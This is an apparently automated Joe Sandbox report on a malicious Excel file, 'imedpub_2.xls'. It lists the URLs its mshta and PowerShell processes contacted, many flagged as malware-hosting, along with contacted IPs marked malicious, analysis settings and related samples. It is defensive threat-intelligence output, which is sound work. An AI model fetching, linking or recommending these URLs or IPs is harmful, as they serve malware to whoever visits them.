                                  https://onewaymedia.ro/wp-includpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://lodev7.com/wp-content/dppowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.theme.min.css?ver=4.9.7.2powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.praachichemfood.com/wp-json/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://bakultante.com/tee5oeot/Qpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.pngpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.pngpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://onewaymedia.ro/wp-includes/k/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://lodev7.cpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://91.240.118.168/zqqw/zaas/fe.htmlW59womshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://trochoi80club.com/wp-content/6shnRU/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.praachichemfood.compowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.yepproject.org/wp-inpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.praachichemfood.com/wp-content/themes/brooklyn/js/ut-scriptlibrary.min.js?ver=4.9.7.2powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.plugins.min.css?ver=5.9powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://praachichemfood.com/publipowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/zqqw/zaas/powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://estiloindustria.com.br/wppowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://dtmconsulting.capowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/zqqw/zaas/fe.pngPE3powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.protware.commshta.exe, 00000004.00000003.436969779.0000000003361000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419444477.000000000054A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419020795.0000000003359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441219939.000000000054A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441507839.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419286271.0000000003323000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419292521.0000000003329000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441437391.0000000003323000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434751908.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419515471.000000000332B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436462360.000000000332C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://worldaviationhub.com/wp-powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://worldaviationhub.com/wp-includes/Lik/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://dtmconsulting.ca/wp-includes/dkCFwyE/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.praachichemfood.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.5powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.praachichemfood.com/feed/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.praachichemfood.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.4powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://futurelube.com/wp-admin/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.168/zqqw/zaas/fe.htmlE59emmshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://91.240.118.168/zqqw/zaas/fe.htmlELmshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://worldaviationhub.com/wp-includes/Lik/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.praachichemfood.com/xmlrpc.phppowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://mortgageadviser.directorpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.praachichemfood.com/wp-content/plugins/ut-shortcodes/js/plugins/modernizr/modernizr.min.jpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://ocsp.entrust.net03powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/mystickyelements-front.min.cspowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.protware.com&wamshta.exe, 00000004.00000003.419444477.000000000054A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://trochoi80club.com/wp-content/6shnRU/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://gmpg.org/xfn/11powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://91.240.11powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		low
                                        https://trochoi80club.com/wp-conpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.praachichemfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.protware.com/mshta.exe, 00000004.00000003.435013837.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441608550.00000000034FB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436969779.0000000003361000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419020795.0000000003359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436148600.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441507839.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441575960.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419245978.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434751908.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437183380.00000000033C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://bakultante.com/tee5oeot/Q/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.240.118.168/zqqw/zaas/fe.htmlP41ylmshta.exe, 00000004.00000003.419347638.00000000004FC000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://lodev7.com/wp-content/dpwjiJivrpgO1F2/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.240.118.168/zqqw/zaas/fe.htmlNmshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.fonts.min.css?ver=5.9powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.praachichemfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.240.118.168/zqqw/zaas/fe.htmlBimedpub_2.xls.0.drtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://haileywells.com/cgi-bin/KJUOaq/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.240.118.168/zqqw/zaas/fe.htmlPmshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://haileywells.com/cgi-bin/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.praachichemfood.com/wp-includes/wlwmanifest.xmlpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.praachichemfood.com/comments/feed/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.pngpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://dtmconsulting.ca/wp-inclpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.praachichemfood.com/wp-content/themes/brooklyn/style.css?ver=4.9.7.2powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://api.w.org/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.jspowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4mshta.exe, 00000004.00000002.440901848.0000000000190000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://91.240.118.168/zqqw/zaas/fe.htmlmshtamshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://bakultante.com/tee5oeot/Q/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.praachichemfood.com/xmlrpc.php?rsdpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://onewaymedia.ro/wp-includes/k/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://91.240.118.168/zqqw/zaas/fe.html.0mshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://praachichemfood.compowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.htmlmshta.exe, 00000004.00000003.421019651.0000000001F85000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://91.240.118.168powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmptrue
                                              • URL Reputation: malware
                                              		unknown
                                              http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.pngpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0.powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://91.240.118.168/zqqw/zaas/fe.htmlfunctionmshta.exe, 00000004.00000003.421233616.0000000001F8D000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  195.154.133.20
                                                  		unknownFrance
                                                  		12876OnlineSASFRtrue
                                                  185.157.82.211
                                                  		unknownPoland
                                                  		42927S-NET-ASPLtrue
                                                  212.237.17.99
                                                  		unknownItaly
                                                  		31034ARUBA-ASNITtrue
                                                  79.172.212.216
                                                  		unknownHungary
                                                  		61998SZERVERPLEXHUtrue
                                                  110.232.117.186
                                                  		unknownAustralia
                                                  		56038RACKCORP-APRackCorpAUtrue
                                                  173.214.173.220
                                                  		unknownUnited States
                                                  		19318IS-AS-1UStrue
                                                  212.24.98.99
                                                  		unknownLithuania
                                                  		62282RACKRAYUABRakrejusLTtrue
                                                  138.185.72.26
                                                  		unknownBrazil
                                                  		264343EmpasoftLtdaMeBRtrue
                                                  178.63.25.185
                                                  		unknownGermany
                                                  		24940HETZNER-ASDEtrue
                                                  160.16.102.168
                                                  		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                  81.0.236.90
                                                  		unknownCzech Republic
                                                  		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                  103.75.201.2
                                                  		unknownThailand
                                                  		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                  216.158.226.206
                                                  		unknownUnited States
                                                  		19318IS-AS-1UStrue
                                                  45.118.115.99
                                                  		unknownIndonesia
                                                  		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                  51.15.4.22
                                                  		unknownFrance
                                                  		12876OnlineSASFRtrue
                                                  159.89.230.105
                                                  		unknownUnited States
                                                  		14061DIGITALOCEAN-ASNUStrue
                                                  162.214.50.39
                                                  		unknownUnited States
                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                  91.240.118.168
                                                  		unknownunknown
                                                  		49453GLOBALLAYERNLtrue
                                                  200.17.134.35
                                                  		unknownBrazil
                                                  		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                                  217.182.143.207
                                                  		unknownFrance
                                                  		16276OVHFRtrue
                                                  107.182.225.142
                                                  		unknownUnited States
                                                  		32780HOSTINGSERVICES-INCUStrue
                                                  51.38.71.0
                                                  		unknownFrance
                                                  		16276OVHFRtrue
                                                  45.118.135.203
                                                  		unknownJapan63949LINODE-APLinodeLLCUStrue
                                                  50.116.54.215
                                                  		unknownUnited States
                                                  		63949LINODE-APLinodeLLCUStrue
                                                  103.138.189.128
                                                  		praachichemfood.comIndia
                                                  		139035GBLINK-AS-APGBLINKNETWORKSOLUTIONSPRIVATELIMITEDINfalse
                                                  131.100.24.231
                                                  		unknownBrazil
                                                  		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                                  46.55.222.11
                                                  		unknownBulgaria
                                                  		34841BALCHIKNETBGtrue
                                                  41.76.108.46
                                                  		unknownSouth Africa
                                                  		327979DIAMATRIXZAtrue
                                                  173.212.193.249
                                                  		unknownGermany
                                                  		51167CONTABODEtrue
                                                  45.176.232.124
                                                  		unknownColombia
                                                  		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                  178.79.147.66
                                                  		unknownUnited Kingdom
                                                  		63949LINODE-APLinodeLLCUStrue
                                                  212.237.5.209
                                                  		unknownItaly
                                                  		31034ARUBA-ASNITtrue
                                                  162.243.175.63
                                                  		unknownUnited States
                                                  		14061DIGITALOCEAN-ASNUStrue
                                                  176.104.106.96
                                                  		unknownSerbia
                                                  		198371NINETRStrue
                                                  207.38.84.195
                                                  		unknownUnited States
                                                  		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                  162.241.211.118
                                                  		dtmconsulting.caUnited States
                                                  		46606UNIFIEDLAYER-AS-1USfalse
                                                  164.68.99.3
                                                  		unknownGermany
                                                  		51167CONTABODEtrue
                                                  192.254.71.210
                                                  		unknownUnited States
                                                  		64235BIGBRAINUStrue
                                                  212.237.56.116
                                                  		unknownItaly
                                                  		31034ARUBA-ASNITtrue
                                                  104.168.155.129
                                                  		unknownUnited States
                                                  		54290HOSTWINDSUStrue
                                                  45.142.114.231
                                                  		unknownGermany
                                                  		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                  203.114.109.124
                                                  		unknownThailand
                                                  		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                  209.59.138.75
                                                  		unknownUnited States
                                                  		32244LIQUIDWEBUStrue
                                                  159.8.59.82
                                                  		unknownUnited States
                                                  		36351SOFTLAYERUStrue
                                                  129.232.188.93
                                                  		unknownSouth Africa
                                                  		37153xneeloZAtrue
                                                  58.227.42.236
                                                  		unknownKorea Republic of
                                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                  158.69.222.101
                                                  		unknownCanada
                                                  		16276OVHFRtrue
                                                  104.251.214.46
                                                  		unknownUnited States
                                                  		54540INCERO-HVVCUStrue

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:562406
                                                  Start date:28.01.2022
                                                  Start time:21:03:46
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 46s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:imedpub_2.xls
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winXLS@25/9@3/48
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HDC Information:
                                                  • Successful, ratio: 21.2% (good quality ratio 17.8%)
                                                  • Quality average: 65.2%
                                                  • Quality standard deviation: 33.2%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 50
                                                  • Number of non-executed functions: 197
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .xls
                                                  • Changed system and user locale, location and keyboard layout to English - United States
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                  • Execution Graph export aborted for target mshta.exe, PID 2692 because there are no executed function
                                                  • Execution Graph export aborted for target powershell.exe, PID 1940 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: imedpub_2.xls

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  21:04:22API Interceptor55x Sleep call for process: mshta.exe modified
                                                  21:04:25API Interceptor440x Sleep call for process: powershell.exe modified
                                                  21:04:49API Interceptor88x Sleep call for process: rundll32.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  195.154.133.20imedpub_6.xlsGet hashmaliciousBrowse
                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                      imedpub.com_10.xlsGet hashmaliciousBrowse
                                                        iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                          iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                            iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                              NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
